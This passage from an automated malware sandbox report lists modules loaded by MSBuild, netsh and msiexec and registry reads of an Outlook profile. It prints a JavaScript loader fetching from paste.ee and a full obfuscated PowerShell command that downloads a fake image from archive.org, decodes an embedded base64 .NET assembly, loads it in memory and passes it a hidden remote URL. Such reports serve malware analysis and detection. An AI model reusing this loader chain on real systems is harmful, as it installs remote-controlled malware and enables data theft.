          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\8198.js.csv");IXMLDOMNode._0000003d("false");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:64 o: f:loadXML a0:%22%3Cpsf%3APrintTicket%20xmlns%3Apsf%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fwindows%2F2003%2F08%2Fprinting%2Fprintschemaframework%22%20xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-");IXMLDOMNode._0000003f("<psf:PrintTicket xmlns:psf="http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:psf2="http://schemas.microsoft.com/windows/2013/12/printing/p");IXMLDOMNode._00000000();ITextStream.WriteLine(" exit:64 o: f:loadXML r:true");IXMLDOMNode._0000003b();IXMLDOMParseError.errorCode();IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:97 o: f:setProperty a0:%22SelectionNamespaces%22 a1:%22xmlns%3Apsf%3D'http%3A%2F%2Fschemas.microsoft.com%2Fwindows%2F2003%2F08%2Fprinting%2Fprintschemaframework'%20xmlns%3Apsf2%3D'http%3A%2F%2Fschemas.microsoft.com%2Fw");IXMLDOMNode._000000cc("SelectionNamespaces", "xmlns:psf='http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework' xmlns:psf2='http://sche");IXMLDOMNode._00000000();ITextStream.WriteLine(" exit:97 o: f:setProperty r:undefined");IXMLDOMNode._00000028();ITextStream.WriteLine(" entry:621 f:");ITextStream.WriteLine(" exec:624 f:");ITextStream.WriteLine(" exit:621 f: r:function%20fassanian(stream%2C%20ardassine%2C%20length%2C%20tag%2C%20sub)");ITextStream.WriteLine(" entry:3295 f:");ITextStream.WriteLine(" exec:3298 f:");ITextStream.WriteLine(" exit:3295 f: r:function%20(name%2C%20cabbing)");ITextStream.WriteLine(" entry:6192 f:");ITextStream.WriteLine(" exec:6195 f:");ITextStream.WriteLine(" exit:6192 f: r:function%20(sinnets)");ITextStream.WriteLine(" entry:7957 f:");ITextStream.WriteLine(" exec:7960 f:");ITextStream.WriteLine(" exit:7957 f: r:function%20Int10(value)");ITextStream.WriteLine(" entry:8667 f:");ITextStream.WriteLine(" exec:8670 f:");ITextStream.WriteLine(" exit:8667 f: r:function%20(fname%2C%20cabbing)");ITextStream.WriteLine(" entry:9221 f:");ITextStream.WriteLine(" exec:9222 f:");ITextStream.WriteLine(" exit:9221 f: r:undefined");ITextStream.WriteLine(" entry:9412 f: a0:");ITextStream.WriteLine(" exec:9415 f:");ITextStream.WriteLine(" exit:9412 f: r:function%20(options)");ITextStream.WriteLine(" entry:9818 f:");ITextStream.WriteLine(" exec:9821 f:");ITextStream.WriteLine(" exit:9818 f: r:function%20(data)");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:10336 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fpaste.ee%2Fd%2FrVRbIsie%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/rVRbIsie", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:10336 o: f:open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:10345 o: f:send");IServerXMLHTTPRequest2.send();bottlehead = { cacotopia: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_03145E28 push esp; ret 7_2_03145E29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0594F5BA push eax; retf 7_2_0594F5C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0594F938 pushad ; iretd 7_2_0594F939
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05DEA580 pushad ; ret 7_2_05DEA581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05E26D50 pushad ; ret 7_2_05E26D59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05F7A310 pushfd ; retf 7_2_05F7AD91
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_06119DC8 push eax; retf 7_2_06119DD5
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
